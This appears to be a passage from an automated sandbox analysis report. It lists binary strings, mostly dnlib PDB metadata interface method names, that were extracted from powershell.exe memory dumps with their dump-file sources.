Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000004.00000002.2418527103.00000207430FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\System.Core.pdb$:IYN source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: n.pdbQ source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
